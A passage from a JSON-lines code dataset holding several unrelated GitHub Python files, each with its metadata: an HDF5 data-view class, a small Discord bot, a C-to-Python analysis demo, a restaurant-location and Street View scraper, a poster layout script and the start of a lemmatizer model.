i_vds)\n fd.create_virtual_dataset(\"outputs\", o_vds)\n\n @property\n def fn(self):\n return self._fn\n\n def destroy(self):\n parent = self._fn.parents[0]\n os.remove(str(self._fn))\n os.rmdir(parent)\n self._fn = None\n\n def __del__(self):\n if self._fn is not None:\n print(\"Deleting object but virtual data set file is not delete from file system\")\n\n\nclass AMSDataView(abc.ABC):\n def __init__(self, ams_store, entry=\"data\", versions=None, **options):\n assert len(self.input_feature_names) == len(\n self.input_feature_dims\n ), \"input feature names does not match dimensions\"\n assert len(self.input_feature_names) == len(\n self.input_feature_types\n ), \"input feature types does not match dimensions of inputs\"\n assert len(self.output_feature_names) == len(\n self.output_feature_dims\n ), \"output feature names does not match output feature dimensions\"\n assert len(self.output_feature_names) == len(\n self.output_feature_types\n ), \"output feature names does not match type dimensions\"\n\n assert entry in 
AMSDataStore.valid_entries, \"entry is not a valid store entry\"\n\n assert entry != \"model\", \"AMSDataviewcannot 'read' models\"\n\n self._store = ams_store\n self._entry = entry\n self._versions = versions\n\n def __enter__(self):\n return self.open()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n return self.close()\n\n def close(self):\n self._fd.close()\n self._fd = None\n self._hvds.destroy()\n self._hvds = None\n\n def open(self):\n if self._store.is_open():\n data_files = self._store.get_files(self._entry, self._versions)\n else:\n store = self._store.open()\n data_files = self._store.get_files(self._entry, self._versions)\n store.close()\n if not data_files:\n raise ValueError(\n f\"Opening AMS Store in entry '{self._entry}' does not have files for the requested versions\"\n )\n\n self._hvds = AMSHDF5VirtualDBReader(data_files, self.input_feature_names, self.output_feature_names)\n self._fd = h5py.File(self._hvds.fn, \"r\")\n return self\n\n @abc.abstractproperty\n def input_feature_names(self):\n \"\"\"a list of the names of the input features\"\"\"\n\n @abc.abstractproperty\n def input_feature_dims(self):\n \"\"\"a list of the dimensions of input features\"\"\"\n\n @abc.abstractproperty\n def input_feature_types(self):\n \"\"\"a list of the types of input features\"\"\"\n\n def describe_inputs(self):\n return {\n \"feature names\": self.input_feature_names,\n \"feature dims\": self.input_feature_dims,\n \"feature types\": self.input_feature_types,\n }\n\n @abc.abstractproperty\n def output_feature_names(self):\n \"\"\"a list of the names of the output features\"\"\"\n\n @abc.abstractproperty\n def output_feature_dims(self):\n \"\"\"a list of the dimensions of output features\"\"\"\n\n @abc.abstractproperty\n def output_feature_types(self):\n \"\"\"a list of the types of output features\"\"\"\n\n def describe_outputs(self):\n return {\n \"feature names\": self.output_feature_names,\n \"feature dims\": self.output_feature_dims,\n \"feature types\": self.output_feature_types,\n }\n\n # methods for collecting data. 
Should be overloaded for more complex workflows\n\n def get_input_data(self):\n \"\"\"Return the input data for this dataset\"\"\"\n\n if self._fd is None:\n raise RuntimeError(\"Trying to access closed AMS dataset\")\n\n return self._fd[\"inputs\"]\n\n def get_output_data(self):\n \"\"\"return the output data for this dataset\"\"\"\n\n if self._fd is None:\n raise RuntimeError(\"Trying to access closed AMS dataset\")\n\n return self._fd[\"outputs\"]\n\n def get_data(self):\n return self.get_input_data(), self.get_output_data()\n\n def get(self, k):\n return self.kosh_dataset.get(k)\n\n @property\n def versions(self):\n return self.versions\n pass\n\n @versions.getter\n def versions(self):\n return self._versions\n", "repo_name": "LLNL/AMS", "sub_path": "src/AMSWorkflow/ams/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "h5py.VirtualLayout", "line_number": 76, "usage_type": "call"}, {"api_name": "h5py.VirtualLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "h5py.VirtualSource", "line_number": 81, "usage_type": "call"}, {"api_name": "h5py.VirtualSource", "line_number": 83, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 100, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 122, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 125, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 135, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 136, "usage_type": "call"}, {"api_name": "abc.ABC", "line_number": 144, "usage_type": "attribute"}, {"api_name": "ams.store.AMSDataStore.valid_entries", "line_number": 159, "usage_type": "attribute"}, {"api_name": "ams.store.AMSDataStore", "line_number": 159, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 192, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 195, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 199, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 203, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 214, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 218, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 222, "usage_type": "attribute"}]} +{"seq_id": "2209228337", "text": "import discord\r\nclient = discord.Client()\r\n@client.event\r\nasync def on_ready():\r\n print('로그인되었습니다!')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('====================================')\r\n\r\n@client.event\r\nasync def on_ready(): # 봇이 실행되면 한 번 실행됨\r\n print(\"이 문장은 Python의 내장 함수를 출력하는 터미널에서 실행됩니다\\n지금 보이는 것 처럼 말이죠\")\r\n await client.change_presence(status=discord.Status.online, activity=discord.Game(\"채편님 팬이에요\"))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content == '심채편':\r\n await message.channel.send('잘생김!')\r\naccess_token = os.environ[\"BOT_TOKEN\"]\r\nclient.run(access_token)\r\n", "repo_name": "kahyul/-", "sub_path": "Untitled-1.py", "file_name": "Untitled-1.py", "file_ext": "py", "file_size_in_byte": 765, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.Client", "line_number": 2, "usage_type": 
"call"}, {"api_name": "discord.Status", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "26149830323", "text": "from pycparser import c_parser, c_ast\nimport ast, astunparse\nfrom polyrec.ctopy import CtoPy\nfrom polyrec.pyast import Analyze\nfrom polyrec.transformations import Transformation\nfrom polyrec.pyastxforms import Transform\nfrom polyrec.witnesstuples import WitnessTuple\nfrom polyrec.dependencetest import Dependence\n\ndef representation(file):\n with open(file) as source:\n # reading the c file\n parser = c_parser.CParser()\n astc = parser.parse(source.read())\n # convert to python\n pysrc = CtoPy(astc)\n tree = ast.parse(pysrc.getPy())\n analyze = Analyze(tree)\n analyze.collect()\n xform = Transform(analyze)\n xform.analyze.depanalyze()\n # print info\n print(\"number of dimensions: \", analyze.getdim())\n print(\"every dimension type: \", analyze.getdimtype())\n print(\"alphabet for each dimension: \", analyze.getalp())\n print(\"order of statements: \", analyze.getord())\n print(\"index variables: \", analyze.getindvar())\n print(\"source code: \", analyze.codegen())\n print(\"Witness Tuples: \", xform.analyze.getdeps())\n\nif __name__ == \"__main__\":\n representation(\"examples/sources/loop-rec.c\")", "repo_name": "kirshanthans/polyrec", "sub_path": "demo/representation.py", "file_name": "representation.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycparser.c_parser.CParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pycparser.c_parser", "line_number": 13, "usage_type": "name"}, {"api_name": "polyrec.ctopy.CtoPy", "line_number": 16, "usage_type": "call"}, {"api_name": "ast.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "polyrec.pyast.Analyze", "line_number": 18, "usage_type": "call"}, {"api_name": "polyrec.pyastxforms.Transform", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "29619233549", "text": "#!/usr/bin/python\nimport requests # HTTP requests\nimport shutil\nimport os\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport argparse\nimport json\nfrom pymongo import MongoClient\n\nMONGO_PEM = os.environ.get(\"MONGO_PEM\")\nMONGO_STRING = os.environ.get(\"MONGO_STRING\")\n\nkey = os.environ.get(\"STREETVIEW_API_KEY\")\n\n\ndef SaveStreetView(filename, params):\n rootURL = \"https://maps.googleapis.com/maps/api/streetview\"\n params[\"key\"] = key,\n\n res = requests.get(rootURL, params=params, stream=True)\n sleep(0.2)\n\n if res.status_code == 200:\n with open(f\"{filename}\", 'wb') as f:\n shutil.copyfileobj(res.raw, f)\n f.close()\n else:\n print('Image Couldn\\'t be retrieved')\n\n\ndef getPage(url):\n ''' returns a soup object that contains all the information\n of a certain webpage'''\n result = requests.get(url)\n sleep(0.1)\n content = result.content\n return BeautifulSoup(content, \"html.parser\")\n\n\ndef getArgs():\n # Create argument parser for dry runs / testing\n parser = argparse.ArgumentParser(\n description=\"Generate artificial Whataburgers\")\n parser.add_argument(\n \"--samples\",\n type=int,\n default=100,\n help=\"Number of samples to grab from page.\",\n )\n parser.add_argument(\n \"--input-file\",\n type=str,\n help=\"Metadata JSON file\",\n )\n parser.add_argument(\n \"--output-dir\",\n type=str,\n default=\"./stores\",\n help=\"Image output directory\",\n )\n 
parser.add_argument(\n \"--output-file\",\n type=str,\n default=\"test.json\",\n help=\"Metadata output filename\",\n )\n parser.add_argument(\n \"--museum\",\n type=str,\n help=\"Museum to peruse\",\n )\n parser.add_argument(\n \"--artist\",\n type=str,\n default=\"\",\n help=\"Artist name\",\n )\n parser.add_argument(\n \"--medium\",\n type=str,\n default=\"\",\n help=\"Art format\",\n )\n parser.add_argument(\n \"--classification\",\n type=str,\n default=\"\",\n help=\"Style of art\",\n )\n return parser.parse_args()\n\n\ndef getMetadata(output_dir):\n '''\n Extract all Whataburger store metadata\n '''\n # Create output directories if needed\n if not os.path.exists(f\"{output_dir}\"):\n os.mkdir(f\"{output_dir}\")\n if not os.path.exists(f\"{output_dir}/metadata\"):\n os.mkdir(f\"{output_dir}/metadata\")\n\n rootURL = \"https://locations.whataburger.com/\"\n\n collection = get_collection()\n existingStores = [item[\"number\"] for item in collection.find()]\n category_index = collection.create_index(\"number\")\n\n # Get BS4 object from webpage\n stateDirectory = getPage(F\"{rootURL}directory.html\")\n # Find all state URLs\n stateSlugs = stateDirectory.findAll(\n \"a\", {\"class\": [\"Directory-listLink\"]}\n )\n\n for state in stateSlugs:\n state = state.attrs[\"href\"]\n # Skip weird URLs\n if len(state) > 8:\n continue\n\n # Get state symbol (ex. \"TX\")\n stateSymbol = state.split(\".\")[0].upper()\n\n cityDirectory = getPage(f\"{rootURL}{state}\")\n citySlugs = cityDirectory.findAll(\n \"a\", {\"class\": \"Directory-listLink\"}\n )\n for city in citySlugs:\n city = city.attrs[\"href\"]\n # Extract city name (Ex. \"Dallas\")\n cityName = city.split(\"/\")[1].split(\".\")[0].title()\n storeDirectory = getPage(f\"{rootURL}{city}\")\n # First look for multiple addresses\n addresses = storeDirectory.findAll(\n \"span\", {\"class\": \"c-address-street-1\"}\n )\n\n # Extra store numbers from page\n numbers = storeDirectory.find(\n \"span\", {\"id\": \"location-name\"})\n\n # If first method fails try others\n if numbers is None:\n numbers = storeDirectory.findAll(\n \"span\", {\"class\": \"locationName-displayName\"})\n else:\n addresses = [addresses[0]]\n\n if len(numbers) == 0:\n numbers = storeDirectory.findAll(\n \"span\", {\"class\": \"LocationName-displayName\"})\n\n for number, address in zip(numbers, addresses):\n # Extract store number as integer\n storeNumber = int(number.text.split(\" #\")[1].strip())\n\n # DB Schema\n # Reformat address for Google API query\n # (ex. 
123+First+St+City+ST)\n params = {\n \"query\": f\"Whataburger+{address.text.replace(' ', '+')},{cityName},{stateSymbol}\",\n \"address\": f\"{address.text}\",\n \"city\": f\"{cityName}\",\n \"state\": f'{stateSymbol}',\n \"number\": storeNumber,\n \"oresent\": False,\n \"size\": \"600x600\",\n \"heading\": [0, 340],\n \"fov\": [60, 90],\n \"pitch\": [8, 12],\n }\n\n if storeNumber in existingStores:\n continue\n\n print(\n f\"Store {storeNumber} is in {params['address'].replace('+',' ')},{cityName},{stateSymbol}\")\n collection.insert_one(params)\n '''\n with open(f\"{output_dir}/metadata/{storeNumber}.json\", \"w\") as f:\n f.write(json.dumps(params))\n f.close()\n\n for angle in range(12):\n params[\"heading\"] = angle * 30\n SaveStreetView(\n f\"{output_dir}/images/{address}/{params['heading']}.jpg\", params)\n '''\n\n\ndef ExtractParams(params):\n return {\n \"location\": params[\"location\"],\n \"size\": params[\"size\"],\n }\n\n\ndef getImages(output_dir):\n for fileName in sorted(os.listdir(f\"{output_dir}/metadata\"))[:10]:\n with open(f\"{output_dir}/metadata/{fileName}\", \"r\") as f:\n params = json.load(f)\n f.close()\n\n if os.path.exists(f\"{output_dir}/images/{params['number']}\"):\n print(f\"Skipping store {params['number']}\")\n # continue\n else:\n os.mkdir(f\"{output_dir}/images/{params['number']}\")\n\n queryParams = {\n \"location\": params[\"location\"],\n \"size\": params[\"size\"],\n }\n\n for degrees in range(params[\"heading\"][0], params[\"heading\"][1], 60):\n queryParams[\"heading\"] = degrees\n for zoom in range(params[\"fov\"][0], params[\"fov\"][1], 5):\n print(f\"Zoom: {zoom}\")\n queryParams[\"fov\"] = zoom\n for angle in range(params[\"pitch\"][0], params[\"pitch\"][1]):\n queryParams[\"pitch\"] = angle\n print(queryParams)\n SaveStreetView(\n f\"{output_dir}/images/{params['number']}/h={degrees},z={zoom},a={angle}.jpg\", queryParams)\n\n\ndef get_collection():\n client = MongoClient(f\"{MONGO_STRING}\",\n tls=True,\n tlsCertificateKeyFile=f\"{MONGO_PEM}\")\n\n db = client['Whataburger']\n return db['stores']\n", "repo_name": "JimothyJohn/WhataGAN", "sub_path": "whatagan/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", 
"line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 210, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 230, "usage_type": "call"}]} +{"seq_id": "41033298938", "text": "from flat import document, image, shape, font, strike\nimport os\nfrom PIL import Image\n\n\nbase_path = 'src/'\n\ndoc_width = 802.2\ndoc_height = 983.6\ndoc_marge_w = 60\ndoc_marge_h = 40\ndoc_gout = 15\n\nlayout_width = (doc_width - (doc_marge_w * 2))\nlayout_height = (doc_height - (doc_marge_h * 2))\n\nsepX = 3\nsepY = 6\ncell_width = layout_width/sepX\ncell_height = layout_height/sepY\nimg_width = cell_width - doc_gout\n\neli_heuer_txt = \"Captures d'écran du compte Twitter \\nd'Eli Heuer du 1er avril au 26 juin 2020 (Twitter.com/eliheuer)\\n© Eli Heuer/Twitter.\"\ntypeface_as_program_txt = \"Impression de la première version du caractère Programme sur une presse typographique, par David Keshavjee \\net Julien Tavelli, 2009 (Optimo.ch/typefaces/programme)\\n© David Keshavjee et Julien Tavelli.\"\nosp_txt = \"Création typographique sur FontForge par Open Source Publishing pour la communication 2020-2021 \\ndu théâtre Balsamine, 2020 (Osp.kitchen/work/balsamine.2020-2021)\\n© OSP/Free Art License version 1.3/Attribution ShareAlike Creative Commons BY-SA.\"\ncatalogtree_txt = \"Dispositif et prototypage pour la réalisation du projet *Structured Light* par Catalogtree, 2010 (Catalogtree.net/projects/structured_light)\\n© Catalogtree.\"\njurg_lehni_txt = \"*Hektor Draws a Landscape* & *Hektor Titles a Show*, « Lee 3 Tau Ceti Central Armory Show », Villa Arson, Nice, Villa Arson, Nice, 2003 et « Design and the Elastic Mind », MoMA New York, Jürg Lehni, 2008. (Juerglehni.com/works/hektor)\\n© Jürg Lehni & Uli Franke, 2002/Jürg Lehni & Alex Rich, 2003.\"\n\nexplication_txt = \"La mise en page de ce poster a été réalisée selon les principes exposés dans l'article au recto, \\\nen utilisant trois bibliothèques du langage Python pour la typographie et le traitement des images : \\\n\\nLa première bibliothèque est une version alpha de Drawbot, adaptée à la librairie graphique Skia \\\npour une utilisation sur différents systèmes d'exploitation par Just Van Rossum (pypi.org/project/drawbot-skia). \\\n\\nLa deuxième bibliothèque, Flat (xxyxyz.org) de Juraj Sukop, ne semble toutefois plus maintenue depuis 2018. \\\n\\nLa troisième bibliothèque, Pillow, est très utilisée (pillow.readthedocs.io) dans le domaine du traitement d'image. 
\\\n\\nLe code qui a permis la réalisation de ce poster est disponible à l'adresse : github.com/jeremien/maj.poster.\"\n\nregular = font.open('font/PlantinMTProRg.TTF')\nbold = font.open('font/Erbarre-Bold.otf')\nbody = strike(regular).size(10)\ntitre = strike(bold).size(13)\n\nd = document(doc_width, doc_height, 'pt')\np = d.addpage()\ns = shape()\n\ndef setImages(folder: str) -> list:\n images = []\n path = base_path + folder + '/'\n with os.scandir(path) as entries:\n for entry in entries:\n try:\n if entry.is_file():\n name = path + entry.name\n try:\n im = Image.open(name).convert('CMYK')\n print(im.mode)\n im.save(\n name,\n resolution=300.0,\n quality=100\n )\n except IOError:\n print('error pillow')\n continue\n\n try:\n im = image.open(name)\n images.append(im)\n except ValueError:\n print('error flat')\n continue\n except FileNotFoundError:\n continue\n print(images)\n return images\n\ndef grid() -> list:\n\n data = []\n posX = cell_width + doc_marge_w\n posY = cell_height + doc_marge_h\n\n x_data = []\n y_data = []\n\n for x in range(sepX):\n x_data.append((posX, posY))\n posX += cell_width\n\n for y in range(sepY):\n y_data.append((posX, posY))\n posY += cell_height\n\n data.append(x_data)\n data.append(y_data)\n\n return data\n\neli_heuer_img = setImages('eli_heuer')\ntypeface_as_program_img = setImages('typeface_as_program')\nosp_img = setImages('osp')\ncatalogtree_img = setImages('catalogtree')\njurg_lehni_img = setImages('jurg_lehni')\n\ng = grid()\n\nfor j in range(sepY):\n if j == 0:\n for i in range(sepX):\n if i == 0:\n p.place(eli_heuer_img[i]).position(doc_marge_w, doc_marge_h).fitwidth(img_width)\n elif i < 2:\n p.place(eli_heuer_img[i]).position(g[0][i-1][0], doc_marge_h).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 1 et 2.')).frame(g[0][i-1][0],doc_marge_h + doc_gout,cell_width,cell_height)\n p.place(body.text(eli_heuer_txt)).frame(g[0][i-1][0] + 70,doc_marge_h + doc_gout,cell_width-doc_marge_w,cell_height)\n \n elif j == 1:\n for i in range(sepX):\n if i == 0:\n p.place(typeface_as_program_img[i]).position(doc_marge_w, g[1][j-1][1] - doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(typeface_as_program_img[i]).position(g[0][i-1][0], g[1][j-1][1] - doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 3 et 4.')).frame(g[0][i-1][0], g[1][j-1][1],cell_width,cell_height)\n p.place(body.text(typeface_as_program_txt)).frame(g[0][i-1][0] + 70, g[1][j-1][1],cell_width - 40,cell_height)\n\n elif j == 2:\n for i in range(sepX):\n if i == 0:\n p.place(osp_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(osp_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 5 et 6.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 2,cell_width,cell_height)\n p.place(body.text(osp_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 2,cell_width - 50,cell_height)\n\n elif j == 3:\n for i in range(sepX):\n if i == 0:\n p.place(catalogtree_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(catalogtree_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 7 et 8.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 2,cell_width,cell_height)\n p.place(body.text(catalogtree_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 2,cell_width - 40,cell_height)\n\n elif j == 4:\n for i in range(sepX):\n if i == 0:\n 
p.place(jurg_lehni_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout * 3).fitwidth(img_width)\n elif i < 2:\n p.place(jurg_lehni_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout * 3).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 9 et 10.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 4,cell_width,cell_height)\n p.place(body.text(jurg_lehni_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 4,cell_width - 40,cell_height)\n\np.place(s.width(0.5).line(doc_marge_w - 20, doc_marge_h , doc_marge_w - 20, doc_height - doc_marge_h))\np.place(body.text(explication_txt)).frame(doc_marge_w, doc_height - (cell_height - doc_gout * 2),cell_width*2.5,cell_height)\n\nunique_id = 'icono'\nd.meta(unique_id).pdf('pdf/' + unique_id + '.pdf', compress=False, bleed=False, cropmarks=False)", "repo_name": "jeremien/maj.poster", "sub_path": "icono/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6916, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flat.font.open", "line_number": 37, "usage_type": "call"}, {"api_name": "flat.font", "line_number": 37, "usage_type": "name"}, {"api_name": "flat.font.open", "line_number": 38, "usage_type": "call"}, {"api_name": "flat.font", "line_number": 38, "usage_type": "name"}, {"api_name": "flat.strike", "line_number": 39, "usage_type": "call"}, {"api_name": "flat.strike", "line_number": 40, "usage_type": "call"}, {"api_name": "flat.document", "line_number": 42, "usage_type": "call"}, {"api_name": "flat.shape", "line_number": 44, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 55, "usage_type": "name"}, {"api_name": "flat.image.open", "line_number": 67, "usage_type": "call"}, {"api_name": "flat.image", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "23838792042", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom torch.nn.utils import rnn as rnn_utils\nfrom torch.distributions.gumbel import Gumbel\nimport numpy as np\nfrom transformers import BertModel, BertConfig\n# from joeynmt.embeddings import Embeddings as Seq2seqEmbeddings\n# from joeynmt.encoders import RecurrentEncoder\n# from joeynmt.decoders import RecurrentDecoder\n# from joeynmt.search import greedy\n\nfrom .token_dictionary import TokenDictionary, UNKNOWN\nfrom .constants import Target, SPECIAL_SYMBOLS, PADDING, BOS, EOS, \\\n ParsingObjective\nfrom ..layers.lstm import CharLSTM, HighwayLSTM, LSTM\nfrom ..layers.biaffine import DeepBiaffineScorer\n\n\ngumbel = Gumbel(0, 1)\nencoder_dim = 768\nmax_encoder_length = 512\n\n\ndef create_padding_mask(lengths):\n \"\"\"\n Create a mask with 1 for padding values and 0 in real values.\n\n :param lengths: length of each sequence\n :return: 2d tensor\n \"\"\"\n batch_size = len(lengths)\n max_len = lengths.max()\n positions = torch.arange(max_len, device=lengths.device)\\\n .expand(batch_size, max_len)\n mask = positions >= lengths.unsqueeze(1)\n\n return mask\n\n\ndef get_padded_lemma_indices(instances, max_instance_length):\n \"\"\"\n Create a tensor with lemma char indices.\n\n :param instances: list of instances\n :param max_instance_length: int, maximum number of tokens including root\n :return: tuple padded_lemmas, padded_lengths. 
Roots are not counted.\n padded_lemmas is a tensor shape (batch, num_words, num_chars)\n padded_lengths is (batch, num_words)\n \"\"\"\n instances_lemmas = []\n lengths = []\n max_instance_length -= 1\n\n for instance in instances:\n # each item in lemma_characters is a numpy array with lemma chars\n # [1:] to skip root\n lemma_list = [torch.tensor(lemma)\n for lemma in instance.lemma_characters[1:]]\n instance_lengths = torch.tensor([len(lemma) for lemma in lemma_list])\n\n # create empty tensors to match max instance length\n diff = max_instance_length - len(lemma_list)\n if diff:\n padding = diff * [torch.tensor([], dtype=torch.long)]\n lemma_list += padding\n\n instance_lemmas = rnn_utils.pad_sequence(lemma_list, batch_first=True)\n\n # we transpose num_tokens with token_length because it is easier to add\n # padding tokens than padding chars\n instances_lemmas.append(instance_lemmas.transpose(0, 1))\n lengths.append(instance_lengths)\n\n padded_transposed = rnn_utils.pad_sequence(instances_lemmas, True)\n padded_lemmas = padded_transposed.transpose(1, 2)\n padded_lengths = rnn_utils.pad_sequence(lengths, batch_first=True)\n\n return padded_lemmas, padded_lengths\n\n\ndef create_char_indices(instances, max_sentence_length):\n \"\"\"\n Create a tensor with the character indices for all words in the instances.\n\n :param instances: a list of DependencyInstance objects\n :param max_sentence_length: int\n :return: a tuple (char_indices, token_lengths). Sentence length includes\n root.\n - char_indices is (batch, max_sentence_length, max_token_length).\n - token_lengths is (batch_size, max_sentence_length)\n \"\"\"\n batch_size = len(instances)\n token_lengths_ = [[len(inst.get_characters(i))\n for i in range(len(inst))]\n for inst in instances]\n max_token_length = max(max(inst_lengths)\n for inst_lengths in token_lengths_)\n\n shape = [batch_size, max_sentence_length]\n token_lengths = torch.zeros(shape, dtype=torch.long)\n\n shape = [batch_size, max_sentence_length, max_token_length]\n char_indices = torch.zeros(shape, dtype=torch.long)\n\n for i, instance in enumerate(instances):\n token_lengths[i, :len(instance)] = torch.tensor(token_lengths_[i])\n\n for j in range(len(instance)):\n # each j is a token\n chars = instance.get_characters(j)\n char_indices[i, j, :len(chars)] = torch.tensor(chars)\n\n return char_indices, token_lengths\n\n\n# class Lemmatizer(nn.Module):\n# \"\"\"\n# Lemmatizer that uses a recurrent encoder-decoder framework.\n# \"\"\"\n# def __init__(self, vocab_size, embedding_size, hidden_size, dropout_rate,\n# context_size, token_dictionary):\n# \"\"\"\n# :param vocab_size: size of the char vocabulary\n# :param embedding_size: size of the char embeddings\n# :param hidden_size: hidden state of the encoder. 
Decoder is twice that.\n# :param dropout_rate: dropout\n# :param context_size: size of the context vector given as additional\n# input\n# :type token_dictionary: TokenDictionary\n# \"\"\"\n# super(Lemmatizer, self).__init__()\n# self.padding_idx = token_dictionary.get_character_id(PADDING)\n# self.eos_idx = token_dictionary.get_character_id(EOS)\n# self.bos_idx = token_dictionary.get_character_id(BOS)\n#\n# self.dropout = nn.Dropout(dropout_rate)\n# self.embeddings = Seq2seqEmbeddings(\n# embedding_size, vocab_size=vocab_size, padding_idx=self.padding_idx)\n# self.encoder = RecurrentEncoder(\n# hidden_size=hidden_size, emb_size=embedding_size,\n# num_layers=2, dropout=dropout_rate, bidirectional=True)\n# self.decoder = RecurrentDecoder(\n# emb_size=embedding_size, hidden_size=2 * hidden_size,\n# encoder=self.encoder, attention='luong', num_layers=2,\n# vocab_size=vocab_size, dropout=dropout_rate, input_feeding=True)\n# self.context_transform = nn.Linear(\n# context_size, embedding_size, bias=False)\n#\n# def append_eos(self, chars, lengths):\n# \"\"\"\n# Append an EOS token at the appropriate position after each sequence.\n#\n# The returned tensor will have the max length increased by one.\n#\n# :param chars: tensor (batch, max_length)\n# :param lengths: tensor (batch)\n# :return: tensor (batch, max_length + 1)\n# \"\"\"\n# batch_size, max_length = chars.shape\n# padding_column = self.padding_idx * torch.ones_like(chars[:, 0])\n# extended = torch.cat([chars, padding_column.unsqueeze(1)], dim=1)\n#\n# # trick to get the last non-padding position\n# extended[torch.arange(batch_size), lengths] = self.eos_idx\n#\n# return extended\n#\n# def prepend_bos(self, chars):\n# \"\"\"\n# Prepend a BOS token at the beginning of the character sequences.\n#\n# The returned tensor will have the max length increased by one.\n#\n# :param chars: tensor (batch, max_length)\n# :return: tensor (batch, max_length + 1)\n# \"\"\"\n# bos_column = self.bos_idx * torch.ones_like(chars[:, 0])\n# extended = torch.cat([bos_column.unsqueeze(1), chars], dim=1)\n#\n# return extended\n#\n# def forward(self, chars, context, token_lengths, gold_chars=None,\n# gold_lengths=None):\n# \"\"\"\n# :param chars: tensor (batch, max_sentence_length, max_token_length)\n# with char ids\n# :param context: tensor (batch, max_sentence_length, max_token_length.\n# num_units) with contextual representation of each word\n# :param token_lengths: tensor (batch, max_sentence_length) with length\n# of each word\n# :param gold_chars: only used in training. 
